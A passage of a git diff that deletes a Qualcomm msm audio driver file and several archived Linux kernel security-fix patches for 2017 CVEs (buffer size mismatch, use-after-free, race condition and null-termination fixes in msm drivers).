-- } -- default: -- err = msm_compr_ioctl_shared(substream, cmd, arg); -- } -- return err; --} -- --static int msm_compr_restart(struct snd_pcm_substream *substream) --{ -- struct snd_pcm_runtime *runtime = substream->runtime; -- struct compr_audio *compr = runtime->private_data; -- struct msm_audio *prtd = &compr->prtd; -- struct audio_aio_write_param param; -- struct audio_buffer *buf = NULL; -- struct output_meta_data_st output_meta_data; -- int time_stamp_flag = 0; -- int buffer_length = 0; -- -- pr_debug("%s, trigger restart\n", __func__); -- -- if (runtime->render_flag & SNDRV_RENDER_STOPPED) { -- buf = prtd->audio_client->port[IN].buf; -- pr_debug("%s:writing %d 
bytes of buffer[%d] to dsp 2\n", -- __func__, prtd->pcm_count, prtd->out_head); -- pr_debug("%s:writing buffer[%d] from 0x%08x\n", -- __func__, prtd->out_head, -- ((unsigned int)buf[0].phys -- + (prtd->out_head * prtd->pcm_count))); -- -- if (runtime->tstamp_mode == SNDRV_PCM_TSTAMP_ENABLE) -- time_stamp_flag = SET_TIMESTAMP; -- else -- time_stamp_flag = NO_TIMESTAMP; -- memcpy(&output_meta_data, (char *)(buf->data + -- prtd->out_head * prtd->pcm_count), -- COMPRE_OUTPUT_METADATA_SIZE); -- -- buffer_length = output_meta_data.frame_size; -- pr_debug("meta_data_length: %d, frame_length: %d\n", -- output_meta_data.meta_data_length, -- output_meta_data.frame_size); -- pr_debug("timestamp_msw: %d, timestamp_lsw: %d\n", -- output_meta_data.timestamp_msw, -- output_meta_data.timestamp_lsw); -- -- param.paddr = (unsigned long)buf[0].phys -- + (prtd->out_head * prtd->pcm_count) -- + output_meta_data.meta_data_length; -- param.len = buffer_length; -- param.msw_ts = output_meta_data.timestamp_msw; -- param.lsw_ts = output_meta_data.timestamp_lsw; -- param.flags = time_stamp_flag; -- param.uid = prtd->session_id; -- if (q6asm_async_write(prtd->audio_client, -- ¶m) < 0) -- pr_err("%s:q6asm_async_write failed\n", -- __func__); -- else -- prtd->out_head = -- (prtd->out_head + 1) & (runtime->periods - 1); -- -- runtime->render_flag &= ~SNDRV_RENDER_STOPPED; -- return 0; -- } -- return 0; --} -- --static int msm_compr_volume_ctl_put(struct snd_kcontrol *kcontrol, -- struct snd_ctl_elem_value *ucontrol) --{ -- int rc = 0; -- struct snd_pcm_volume *vol = snd_kcontrol_chip(kcontrol); -- struct snd_pcm_substream *substream = -- vol->pcm->streams[SNDRV_PCM_STREAM_PLAYBACK].substream; -- struct msm_audio *prtd; -- int volume = ucontrol->value.integer.value[0]; -- -- pr_debug("%s: volume : %x\n", __func__, volume); -- if (!substream) -- return -ENODEV; -- if (!substream->runtime) -- return 0; -- prtd = substream->runtime->private_data; -- if (prtd) -- rc = compressed_set_volume(prtd, 
volume); -- -- return rc; --} -- --static int msm_compr_volume_ctl_get(struct snd_kcontrol *kcontrol, -- struct snd_ctl_elem_value *ucontrol) --{ -- struct snd_pcm_volume *vol = snd_kcontrol_chip(kcontrol); -- struct snd_pcm_substream *substream = -- vol->pcm->streams[SNDRV_PCM_STREAM_PLAYBACK].substream; -- struct msm_audio *prtd; -- -- pr_debug("%s\n", __func__); -- if (!substream) -- return -ENODEV; -- if (!substream->runtime) -- return 0; -- prtd = substream->runtime->private_data; -- if (prtd) -- ucontrol->value.integer.value[0] = prtd->volume; -- return 0; --} -- --static int msm_compr_add_controls(struct snd_soc_pcm_runtime *rtd) --{ -- int ret = 0; -- struct snd_pcm *pcm = rtd->pcm; -- struct snd_pcm_volume *volume_info; -- struct snd_kcontrol *kctl; -- -- dev_dbg(rtd->dev, "%s, Volume cntrl add\n", __func__); -- ret = snd_pcm_add_volume_ctls(pcm, SNDRV_PCM_STREAM_PLAYBACK, -- NULL, 1, rtd->dai_link->be_id, -- &volume_info); -- if (ret < 0) -- return ret; -- kctl = volume_info->kctl; -- kctl->put = msm_compr_volume_ctl_put; -- kctl->get = msm_compr_volume_ctl_get; -- kctl->tlv.p = compr_rx_vol_gain; -- return 0; --} -- --static struct snd_pcm_ops msm_compr_ops = { -- .open = msm_compr_open, -- .hw_params = msm_compr_hw_params, -- .close = msm_compr_close, -- .ioctl = msm_compr_ioctl, -- .prepare = msm_compr_prepare, -- .trigger = msm_compr_trigger, -- .pointer = msm_compr_pointer, -- .mmap = msm_compr_mmap, -- .restart = msm_compr_restart, --#ifdef CONFIG_COMPAT -- .compat_ioctl = msm_compr_compat_ioctl, --#endif --}; -- --static int msm_asoc_pcm_new(struct snd_soc_pcm_runtime *rtd) --{ -- struct snd_card *card = rtd->card->snd_card; -- int ret = 0; -- -- if (!card->dev->coherent_dma_mask) -- card->dev->coherent_dma_mask = DMA_BIT_MASK(32); -- -- ret = msm_compr_add_controls(rtd); -- if (ret) -- pr_err("%s, kctl add failed\n", __func__); -- return ret; --} -- --static struct snd_soc_platform_driver msm_soc_platform = { -- .ops = &msm_compr_ops, -- .pcm_new 
= msm_asoc_pcm_new, --}; -- --static int msm_compr_probe(struct platform_device *pdev) --{ -- -- dev_info(&pdev->dev, "%s: dev name %s\n", -- __func__, dev_name(&pdev->dev)); -- -- return snd_soc_register_platform(&pdev->dev, -- &msm_soc_platform); --} -- --static int msm_compr_remove(struct platform_device *pdev) --{ -- snd_soc_unregister_platform(&pdev->dev); -- return 0; --} -- --static const struct of_device_id msm_compr_dt_match[] = { -- {.compatible = "qcom,msm-compr-dsp"}, -- {} --}; --MODULE_DEVICE_TABLE(of, msm_compr_dt_match); -- --static struct platform_driver msm_compr_driver = { -- .driver = { -- .name = "msm-compr-dsp", -- .owner = THIS_MODULE, -- .of_match_table = msm_compr_dt_match, -- }, -- .probe = msm_compr_probe, -- .remove = msm_compr_remove, --}; -- --static int __init msm_soc_platform_init(void) --{ -- init_waitqueue_head(&the_locks.enable_wait); -- init_waitqueue_head(&the_locks.eos_wait); -- init_waitqueue_head(&the_locks.write_wait); -- init_waitqueue_head(&the_locks.read_wait); -- init_waitqueue_head(&the_locks.flush_wait); -- -- return platform_driver_register(&msm_compr_driver); --} --module_init(msm_soc_platform_init); -- --static void __exit msm_soc_platform_exit(void) --{ -- platform_driver_unregister(&msm_compr_driver); --} --module_exit(msm_soc_platform_exit); -- --MODULE_DESCRIPTION("PCM module platform driver"); --MODULE_LICENSE("GPL v2"); -diff --git a/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.h b/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.h -deleted file mode 100644 -index d6e3ec6..0000000 ---- a/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.h -+++ /dev/null -@@ -1,36 +0,0 @@ --/* -- * Copyright (c) 2012, The Linux Foundation. All rights reserved. -- * -- * This program is free software; you can redistribute it and/or modify -- * it under the terms of the GNU General Public License version 2 and -- * only version 2 as published by the Free Software Foundation. 
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#ifndef _MSM_COMPR_H
--#define _MSM_COMPR_H
--#include
--#include
--#include
--#include
--#include
--
--#include "msm-pcm-q6-v2.h"
--
--struct compr_info {
-- struct snd_compr_caps compr_cap;
-- struct snd_compr_codec_caps codec_caps;
-- struct snd_compr_params codec_param;
--};
--
--struct compr_audio {
-- struct msm_audio prtd;
-- struct compr_info info;
-- uint32_t codec;
--};
--
--#endif /*_MSM_COMPR_H*/
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9678/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-9678/3.18/0001.patch
deleted file mode 100644
index 959bc8ff..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9678/3.18/0001.patch
+++ /dev/null
@@ -1,42 +0,0 @@
-From 420d0dc1b4563880f962002e8cb21e733bf074eb Mon Sep 17 00:00:00 2001
-From: Harsh Sahu
-Date: Fri, 21 Apr 2017 16:12:22 -0700
-Subject: [PATCH] msm: mdss: fix memcpy source and dest memory buffer size
- mismatch
-
-Currently memcpy is copying from a bigger memory size to a smaller
-memory size, which may lead to buffer overflow. This change corrects
-this issue by performing the memcopy restricted to the smaller of the
-src or dest memory buffer.
-
-Bug: 35258962
-Change-Id: Ibbe5665083799a4262d3cfbb06f94f3e35e03748
-Signed-off-by: Harsh Sahu
----
- drivers/video/msm/mdss/mdss_compat_utils.c | 6 +++++-
- 1 file changed, 5 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/video/msm/mdss/mdss_compat_utils.c b/drivers/video/msm/mdss/mdss_compat_utils.c
-index 7159d91148645..ec08626ba7765 100644
---- a/drivers/video/msm/mdss/mdss_compat_utils.c
-+++ b/drivers/video/msm/mdss/mdss_compat_utils.c
-@@ -119,14 +119,18 @@ static unsigned int __do_compat_ioctl_nr(unsigned int cmd32)
- static void __copy_atomic_commit_struct(struct mdp_layer_commit *commit,
- struct mdp_layer_commit32 *commit32)
- {
-+ unsigned int destSize = sizeof(commit->commit_v1.reserved);
-+ unsigned int srcSize = sizeof(commit32->commit_v1.reserved);
-+ unsigned int count = (destSize <= srcSize ? destSize : srcSize);
- commit->version = commit32->version;
- commit->commit_v1.flags = commit32->commit_v1.flags;
- commit->commit_v1.input_layer_cnt =
- commit32->commit_v1.input_layer_cnt;
- commit->commit_v1.left_roi = commit32->commit_v1.left_roi;
- commit->commit_v1.right_roi = commit32->commit_v1.right_roi;
-+
- memcpy(&commit->commit_v1.reserved, &commit32->commit_v1.reserved,
-- sizeof(commit32->commit_v1.reserved));
-+ count);
- }
-
- static struct mdp_input_layer32 *__create_layer_list32(
diff --git a/Patches/Linux_CVEs/CVE-2017-9678/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-9678/4.4/0002.patch
deleted file mode 100644
index 6dfb96ca..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9678/4.4/0002.patch
+++ /dev/null
@@ -1,42 +0,0 @@
-From ad8e758d30164290a71d9c59fbf7854029556a3e Mon Sep 17 00:00:00 2001
-From: Harsh Sahu
-Date: Fri, 21 Apr 2017 16:12:22 -0700
-Subject: msm: mdss: fix memcpy source and dest memory buffer size mismatch
-
-Currently memcpy is copying from a bigger memory size to a smaller
-memory size. This change corrects this issue by performing the
-memcopy restricted to the smaller of the src or dest memory buffer.
-
-CRs-fixed: 2028228
-Change-Id: Ibbe5665083799a4262d3cfbb06f94f3e35e03748
-Signed-off-by: Harsh Sahu
----
- drivers/video/fbdev/msm/mdss_compat_utils.c | 5 ++++-
- 1 file changed, 4 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/video/fbdev/msm/mdss_compat_utils.c b/drivers/video/fbdev/msm/mdss_compat_utils.c
-index e9ba775..ba3dec2 100644
---- a/drivers/video/fbdev/msm/mdss_compat_utils.c
-+++ b/drivers/video/fbdev/msm/mdss_compat_utils.c
-@@ -119,6 +119,9 @@ static unsigned int __do_compat_ioctl_nr(unsigned int cmd32)
- static void __copy_atomic_commit_struct(struct mdp_layer_commit *commit,
- struct mdp_layer_commit32 *commit32)
- {
-+ unsigned int destSize = sizeof(commit->commit_v1.reserved);
-+ unsigned int srcSize = sizeof(commit32->commit_v1.reserved);
-+ unsigned int count = (destSize <= srcSize ? destSize : srcSize);
- commit->version = commit32->version;
- commit->commit_v1.flags = commit32->commit_v1.flags;
- commit->commit_v1.input_layer_cnt =
-@@ -127,7 +130,7 @@ static void __copy_atomic_commit_struct(struct mdp_layer_commit *commit,
- commit->commit_v1.right_roi = commit32->commit_v1.right_roi;
- commit->commit_v1.bl_level = commit32->commit_v1.bl_level;
- memcpy(&commit->commit_v1.reserved, &commit32->commit_v1.reserved,
-- sizeof(commit32->commit_v1.reserved));
-+ count);
- }
-
- static struct mdp_input_layer32 *__create_layer_list32(
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9679/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-9679/ANY/0001.patch
deleted file mode 100644
index 0aa2e795..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9679/ANY/0001.patch
+++ /dev/null
@@ -1,45 +0,0 @@
-From 31f54e33d88c676bedb64127b5ae0c60d06f9518 Mon Sep 17 00:00:00 2001
-From: Abir Ghosh
-Date: Tue, 11 Apr 2017 10:01:15 +0530
-Subject: [PATCH] qbt1000: Terminate fingerprint TA name with null
-
-Terminate the string, coming from userspace and containing the name
-of fingerprint trusted app, with null character, to make sure kernel
-memory does not leak into logs
-
-Bug: 35644510
-Change-Id: I1668a64fcb6747ce3ef3b1ee6321fa5fa4a1798a
-CRs-Fixed: 2029409
-Signed-off-by: Abir Ghosh
----
- drivers/soc/qcom/qbt1000.c | 8 +++++---
- 1 file changed, 5 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/soc/qcom/qbt1000.c b/drivers/soc/qcom/qbt1000.c
-index bd6f0e6005f31..6b3d34bc8c970 100755
---- a/drivers/soc/qcom/qbt1000.c
-+++ b/drivers/soc/qcom/qbt1000.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2015-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2015-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -803,13 +803,15 @@ static long qbt1000_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- }
- }
-
-+ app.name[MAX_NAME_SIZE - 1] = '\0';
-+
- /* start the TZ app */
- rc = qseecom_start_app(&drvdata->app_handle, app.name, app.size);
- if (rc == 0) {
- g_app_buf_size = app.size;
- } else {
-- dev_err(drvdata->dev, "%s: App %s failed to load\n",
-- __func__, app.name);
-+ dev_err(drvdata->dev, "%s: Fingerprint Trusted App failed to load\n",
-+ __func__);
- goto end;
- }
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9680/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-9680/ANY/0001.patch
deleted file mode 100644
index a58d2bd4..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9680/ANY/0001.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From dcd0a696c33dd3ab824151833d787f3ff90abbba Mon Sep 17 00:00:00 2001
-From: Abir Ghosh
-Date: Tue, 11 Apr 2017 10:10:23 +0530
-Subject: qbt1000: Initialize drvdata structure before usage
-
-Fix uninitialized local variable error which might have lead to
-crash
-
-Change-Id: I3fd95cb343c3175e4190c8ebfe209399db0602a6
-CRs-Fixed: 2030137
-Signed-off-by: Abir Ghosh
----
- drivers/soc/qcom/qbt1000.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/soc/qcom/qbt1000.c b/drivers/soc/qcom/qbt1000.c
-index b24978c..7f99c86 100644
---- a/drivers/soc/qcom/qbt1000.c
-+++ b/drivers/soc/qcom/qbt1000.c
-@@ -753,13 +753,14 @@ static long qbt1000_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- void __user *priv_arg = (void __user *)arg;
- struct qbt1000_drvdata *drvdata;
-
-+ drvdata = file->private_data;
-+
- if (IS_ERR(priv_arg)) {
- dev_err(drvdata->dev, "%s: invalid user space pointer %lu\n",
- __func__, arg);
- return -EINVAL;
- }
-
-- drvdata = file->private_data;
- pm_runtime_get_sync(drvdata->dev);
- mutex_lock(&drvdata->mutex);
- if (((drvdata->sensor_conn_type == SPI) && (!drvdata->clock_state)) ||
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9682/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-9682/3.18/0001.patch
deleted file mode 100644
index 8d40372f..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9682/3.18/0001.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From cd821a40b76919b0815a9a7c09d0f6cf1f15a7ee Mon Sep 17 00:00:00 2001
-From: Sunil Khatri
-Date: Mon, 5 Jun 2017 11:16:57 -0700
-Subject: [PATCH] msm: kgsl: Fix the race between context create and destroy
-
-Hold the context lock before updating the context id in
-param->drawctxt_id to avoid race condition between context
-creation and context destroy.
-
-Bug: 36491445
-Change-Id: Ic26d3e5b68078c02d15c38080b1a262ea4b1f7fe
-Signed-off-by: Sunil Khatri
----
- drivers/gpu/msm/kgsl.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/gpu/msm/kgsl.c b/drivers/gpu/msm/kgsl.c
-index 7186ccf6b0cb3..5fce561ae971e 100644
---- a/drivers/gpu/msm/kgsl.c
-+++ b/drivers/gpu/msm/kgsl.c
-@@ -1668,9 +1668,9 @@ long kgsl_ioctl_drawctxt_create(struct kgsl_device_private *dev_priv,
- /* Commit the pointer to the context in context_idr */
- write_lock(&device->context_lock);
- idr_replace(&device->context_idr, context, context->id);
-+ param->drawctxt_id = context->id;
- write_unlock(&device->context_lock);
-
-- param->drawctxt_id = context->id;
- done:
- return result;
- }
diff --git a/Patches/Linux_CVEs/CVE-2017-9682/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-9682/4.4/0002.patch
deleted file mode 100644
index 7c9e3a92..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9682/4.4/0002.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From 1c4ddc4c7a4fcdf9371048ce01a6b0e5d2a2bae9 Mon Sep 17 00:00:00 2001
-From: Sunil Khatri
-Date: Thu, 6 Apr 2017 18:28:31 +0530
-Subject: msm: kgsl: Fix the race between context create and destroy
-
-Hold the context lock before updating the context id in
-param->drawctxt_id to avoid race condition between context
-creation and context destroy.
-
-Change-Id: Ic26d3e5b68078c02d15c38080b1a262ea4b1f7fe
-Signed-off-by: Sunil Khatri
----
- drivers/gpu/msm/kgsl.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/gpu/msm/kgsl.c b/drivers/gpu/msm/kgsl.c
-index 1de8e21..54f591e4 100644
---- a/drivers/gpu/msm/kgsl.c
-+++ b/drivers/gpu/msm/kgsl.c
-@@ -1764,9 +1764,9 @@ long kgsl_ioctl_drawctxt_create(struct kgsl_device_private *dev_priv,
- /* Commit the pointer to the context in context_idr */
- write_lock(&device->context_lock);
- idr_replace(&device->context_idr, context, context->id);
-+ param->drawctxt_id = context->id;
- write_unlock(&device->context_lock);
-
-- param->drawctxt_id = context->id;
- done:
- return result;
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9684/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-9684/ANY/0001.patch
deleted file mode 100644
index e18033bb..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9684/ANY/0001.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From d3d636627c8bb57a64bfadcc5d282c35d152f563 Mon Sep 17 00:00:00 2001
-From: Mayank Rana
-Date: Thu, 28 Aug 2014 15:11:44 -0700
-Subject: [PATCH] f_qc_rndis: Check config or cdev is NULL in before accessing
-
-RNDIS control path completion handlers are getting called during
-disconnect as part of composition switch and this is leading to a
-crash. Avoid this crash, by checking, if cdev is not NULL before
-accessing.
-
-CRs-Fixed: 717035
-Bug: 35136547
-Change-Id: Id8748f963298129a403ffd6e4413476013315061
-Signed-off-by: Mayank Rana
----
- drivers/usb/gadget/f_qc_rndis.c | 9 ++++++++-
- 1 file changed, 8 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/usb/gadget/f_qc_rndis.c b/drivers/usb/gadget/f_qc_rndis.c
-index 3bccfe8fc5a76..dfa3dd6ed18dd 100644
---- a/drivers/usb/gadget/f_qc_rndis.c
-+++ b/drivers/usb/gadget/f_qc_rndis.c
-@@ -552,7 +552,14 @@ static void rndis_qc_response_complete(struct usb_ep *ep,
- {
- struct f_rndis_qc *rndis = req->context;
- int status = req->status;
-- struct usb_composite_dev *cdev = rndis->port.func.config->cdev;
-+ struct usb_composite_dev *cdev;
-+
-+ if (!rndis->port.func.config || !rndis->port.func.config->cdev) {
-+ pr_err("%s(): cdev or config is NULL.\n", __func__);
-+ return;
-+ } else {
-+ cdev = rndis->port.func.config->cdev;
-+ }
-
- /* after TX:
- * - USB_CDC_GET_ENCAPSULATED_RESPONSE (ep0/control)
diff --git a/Patches/Linux_CVEs/CVE-2017-9684/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2017-9684/ANY/0002.patch
deleted file mode 100644
index fdaba97c..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9684/ANY/0002.patch
+++ /dev/null
@@ -1,60 +0,0 @@
-From 83cf9f50cda5ab3f99055242bebbcb26d96319ad Mon Sep 17 00:00:00 2001
-From: Jack Pham
-Date: Wed, 6 Aug 2014 19:52:49 -0700
-Subject: [PATCH] usb: gadget: qc_rndis: Properly handle rndis_ipa_init failure
-
-Currently if rndis_ipa_init() fails port->func doesn't get
-removed from the configuration list, and will lead to a
-use-after-free when the calling function later tries to remove
-the function. Fix this to handle the failure gracefully and only
-call usb_add_function() if it succeeded.
-
-Bug: 35136547
-Change-Id: I2ad0dfeaea6b5b6ba1e47aad564ac052348677e6
-Signed-off-by: Jack Pham
----
- drivers/usb/gadget/f_qc_rndis.c | 22 ++++++++++++----------
- 1 file changed, 12 insertions(+), 10 deletions(-)
-
-diff --git a/drivers/usb/gadget/f_qc_rndis.c b/drivers/usb/gadget/f_qc_rndis.c
-index dfa3dd6ed18dd..819bde5072a39 100644
---- a/drivers/usb/gadget/f_qc_rndis.c
-+++ b/drivers/usb/gadget/f_qc_rndis.c
-@@ -1206,25 +1206,27 @@ rndis_qc_bind_config_vendor(struct usb_configuration *c, u8 ethaddr[ETH_ALEN],
-
- _rndis_qc = rndis;
-
-+ if (rndis->xport == USB_GADGET_XPORT_BAM2BAM_IPA) {
-+ status = rndis_ipa_init(&rndis_ipa_params);
-+ if (status) {
-+ pr_err("%s: failed to init rndis_ipa\n", __func__);
-+ goto fail;
-+ }
-+ }
-+
- status = usb_add_function(c, &rndis->port.func);
- if (status) {
-- kfree(rndis);
-+ if (rndis->xport == USB_GADGET_XPORT_BAM2BAM_IPA)
-+ rndis_ipa_cleanup(rndis_ipa_params.private);
- goto fail;
- }
-
- if (rndis->xport != USB_GADGET_XPORT_BAM2BAM_IPA)
- return status;
-
-- status = rndis_ipa_init(&rndis_ipa_params);
-- if (status) {
-- pr_err("%s: failed to initialize rndis_ipa\n", __func__);
-- kfree(rndis);
-- goto fail;
-- } else {
-- pr_debug("%s: rndis_ipa successful created\n", __func__);
-- return status;
-- }
- fail:
-+ kfree(rndis);
-+ _rndis_qc = NULL;
- rndis_exit();
- return status;
- }
diff --git a/Patches/Linux_CVEs/CVE-2017-9684/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2017-9684/ANY/0003.patch
deleted file mode 100644
index 8a596b5f..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9684/ANY/0003.patch
+++ /dev/null
@@ -1,259 +0,0 @@ -From b2fa897c8e86362946ec524ed47300164a33453d Mon Sep 17 00:00:00 2001 -From: Lena Salman -Date: Wed, 14 May 2014 10:59:58 +0300 -Subject: [PATCH] USB: f_qc_rndis: Prevent use-after-free for _rndis_qc - -Assume that there are two threads, thread1 is setting -value of _rndis_qc variable in rndis_qc_bind_config_vendor -function. Thread2 jumps in and get the value of _rndis_qc -in rndis_qc_open_dev function before it is freed in -rndis_qc_bind_config_vendor function, since rndis_ipa_init -or usb_add_function failed. Use-after-free will happen as -Thread2 is referencing freed objects. To prevent this -spinlock is used where ever it is needed to protect -_rndis_qc variable. - -Bug: 35136547 -Change-Id: Ib45ae14281821eeaf79419e8d177cb5d51b94df8 ---- - drivers/usb/gadget/f_qc_rndis.c | 105 +++++++++++++++++++++++++++++----------- - 1 file changed, 76 insertions(+), 29 deletions(-) - -diff --git a/drivers/usb/gadget/f_qc_rndis.c b/drivers/usb/gadget/f_qc_rndis.c -index 819bde5072a39..b7f37df6921d8 100644 ---- a/drivers/usb/gadget/f_qc_rndis.c -+++ b/drivers/usb/gadget/f_qc_rndis.c -@@ -81,7 +81,7 @@ - */ - - struct f_rndis_qc { -- struct qc_gether port; -+ struct qc_gether port; - u8 ctrl_id, data_id; - u8 ethaddr[ETH_ALEN]; - u32 vendorID; -@@ -90,8 +90,8 @@ struct f_rndis_qc { - u32 max_pkt_size; - const char *manufacturer; - int config; -- atomic_t ioctl_excl; -- atomic_t open_excl; -+ atomic_t ioctl_excl; -+ atomic_t open_excl; - - struct usb_ep *notify; - struct usb_request *notify_req; -@@ -101,6 +101,7 @@ struct f_rndis_qc { - }; - - static struct ipa_usb_init_params rndis_ipa_params; -+static spinlock_t rndis_lock; - static bool rndis_ipa_supported; - static void rndis_qc_open(struct qc_gether *geth); - -@@ -548,7 +549,7 @@ static void rndis_qc_response_available(void *_rndis) - } - - static void rndis_qc_response_complete(struct usb_ep *ep, -- struct usb_request *req) -+ struct usb_request *req) - { - struct f_rndis_qc *rndis = req->context; - 
int status = req->status; -@@ -693,7 +694,7 @@ rndis_qc_setup(struct usb_function *f, const struct usb_ctrlrequest *ctrl) - - static int rndis_qc_set_alt(struct usb_function *f, unsigned intf, unsigned alt) - { -- struct f_rndis_qc *rndis = func_to_rndis_qc(f); -+ struct f_rndis_qc *rndis = func_to_rndis_qc(f); - struct usb_composite_dev *cdev = f->config->cdev; - - /* we know alt == 0 */ -@@ -1033,6 +1034,7 @@ static void - rndis_qc_unbind(struct usb_configuration *c, struct usb_function *f) - { - struct f_rndis_qc *rndis = func_to_rndis_qc(f); -+ unsigned long flags; - - pr_debug("rndis_qc_unbind: free"); - bam_data_destroy(0); -@@ -1051,7 +1053,10 @@ rndis_qc_unbind(struct usb_configuration *c, struct usb_function *f) - rndis_ipa_supported = false; - } - -+ spin_lock_irqsave(&rndis_lock, flags); - kfree(rndis); -+ _rndis_qc = NULL; -+ spin_unlock_irqrestore(&rndis_lock, flags); - } - - bool is_rndis_ipa_supported(void) -@@ -1204,8 +1209,6 @@ rndis_qc_bind_config_vendor(struct usb_configuration *c, u8 ethaddr[ETH_ALEN], - rndis->port.func.suspend = rndis_qc_suspend; - rndis->port.func.resume = rndis_qc_resume; - -- _rndis_qc = rndis; -- - if (rndis->xport == USB_GADGET_XPORT_BAM2BAM_IPA) { - status = rndis_ipa_init(&rndis_ipa_params); - if (status) { -@@ -1221,86 +1224,128 @@ rndis_qc_bind_config_vendor(struct usb_configuration *c, u8 ethaddr[ETH_ALEN], - goto fail; - } - -- if (rndis->xport != USB_GADGET_XPORT_BAM2BAM_IPA) -- return status; -+ _rndis_qc = rndis; -+ -+ return status; - - fail: -- kfree(rndis); -- _rndis_qc = NULL; -+ kfree(rndis); -+ _rndis_qc = NULL; - rndis_exit(); - return status; - } - - static int rndis_qc_open_dev(struct inode *ip, struct file *fp) - { -+ int ret = 0; -+ unsigned long flags; - pr_info("Open rndis QC driver\n"); - -+ spin_lock_irqsave(&rndis_lock, flags); - if (!_rndis_qc) { - pr_err("rndis_qc_dev not created yet\n"); -- return -ENODEV; -+ ret = -ENODEV; -+ goto fail; - } - - if (rndis_qc_lock(&_rndis_qc->open_excl)) { - 
pr_err("Already opened\n"); -- return -EBUSY; -+ ret = -EBUSY; -+ goto fail; - } - - fp->private_data = _rndis_qc; -- pr_info("rndis QC file opened\n"); -+fail: -+ spin_unlock_irqrestore(&rndis_lock, flags); - -- return 0; -+ if (!ret) -+ pr_info("rndis QC file opened\n"); -+ -+ return ret; - } - - static int rndis_qc_release_dev(struct inode *ip, struct file *fp) - { -- struct f_rndis_qc *rndis = fp->private_data; -- -+ unsigned long flags; - pr_info("Close rndis QC file"); -- rndis_qc_unlock(&rndis->open_excl); - -+ spin_lock_irqsave(&rndis_lock, flags); -+ -+ if (!_rndis_qc) { -+ pr_err("rndis_qc_dev not present\n"); -+ spin_unlock_irqrestore(&rndis_lock, flags); -+ return -ENODEV; -+ } -+ rndis_qc_unlock(&_rndis_qc->open_excl); -+ spin_unlock_irqrestore(&rndis_lock, flags); - return 0; - } - - static long rndis_qc_ioctl(struct file *fp, unsigned cmd, unsigned long arg) - { -- struct f_rndis_qc *rndis = fp->private_data; -+ u8 qc_max_pkt_per_xfer = 0; -+ u32 qc_max_pkt_size = 0; - int ret = 0; -+ unsigned long flags; -+ -+ spin_lock_irqsave(&rndis_lock, flags); -+ if (!_rndis_qc) { -+ pr_err("rndis_qc_dev not present\n"); -+ ret = -ENODEV; -+ goto fail; -+ } - -- pr_info("Received command %d", cmd); -+ qc_max_pkt_per_xfer = _rndis_qc->max_pkt_per_xfer; -+ qc_max_pkt_size = _rndis_qc->max_pkt_size; - -- if (rndis_qc_lock(&rndis->ioctl_excl)) -- return -EBUSY; -+ if (rndis_qc_lock(&_rndis_qc->ioctl_excl)) { -+ ret = -EBUSY; -+ goto fail; -+ } -+ -+ spin_unlock_irqrestore(&rndis_lock, flags); -+ -+ pr_info("Received command %d\n", cmd); - - switch (cmd) { - case RNDIS_QC_GET_MAX_PKT_PER_XFER: - ret = copy_to_user((void __user *)arg, -- &rndis->max_pkt_per_xfer, -- sizeof(rndis->max_pkt_per_xfer)); -+ &qc_max_pkt_per_xfer, -+ sizeof(qc_max_pkt_per_xfer)); - if (ret) { - pr_err("copying to user space failed"); - ret = -EFAULT; - } - pr_info("Sent max packets per xfer %d", -- rndis->max_pkt_per_xfer); -+ qc_max_pkt_per_xfer); - break; - case RNDIS_QC_GET_MAX_PKT_SIZE: 
